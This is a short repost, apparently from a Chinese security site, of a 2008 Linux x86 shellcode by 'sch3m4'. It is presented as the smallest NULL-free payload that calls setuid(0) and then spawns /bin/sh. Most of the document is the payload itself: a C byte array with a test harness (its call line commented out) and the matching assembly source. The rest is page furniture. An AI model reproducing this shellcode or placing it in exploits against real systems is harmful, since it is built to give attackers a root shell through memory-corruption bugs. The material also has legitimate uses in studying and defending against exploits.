|
linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 27 bytes
|
|
来源:http://opensec.es 作者:sch3m4 发布时间:2008-11-15
|
|
-----------[ C Source Code ]-----------
/*
Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode without NULLs
Coded by Chema Garcia (aka sch3m4)
+ sch3m4@opensec.es
+ http://opensec.es
Shellcode Size: 27 bytes
Date: 13/11/2008
*/
#include <stdio.h>
const char shellcode[]= "\x31\xC0" //xor eax,eax
"\x31\xC9" //xor ecx,ecx
"\xB0\x17" //mov al,17h
"\x60" //pusha
"\xCD\x80" //int 80h
"\x61" //popa
"\x51" //push ecx
"\x68\x6E\x2F\x73\x68" //push 0x68732f6e
"\x68\x2F\x2F\x62\x69" //push 0x69622f2f
"\x89\xE3" //mov ebx, esp
"\xB0\x0B" //mov al,0xb
"\xCD\x80"; //int 0x80
int main()
{
printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode without NULLs"
"\n\nCoded by Chema Garcia (aka sch3m4)"
"\n\t + sch3m4@opensec.es"
"\n\t + http://opensec.es"
"\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);
//(*(void (*)()) shellcode)();
return 0;
}
-----------[/ C Source Code ]-----------
-----------[ ASM Source Code ]-----------
global _start
section .text
_start:
xor eax,eax
xor ecx,ecx
mov al,17h
pusha
int 80h ;setuid
popa
push ecx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
mov al,0xb
int 0x80;execve
-----------[/ ASM Source Code ]-----------
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
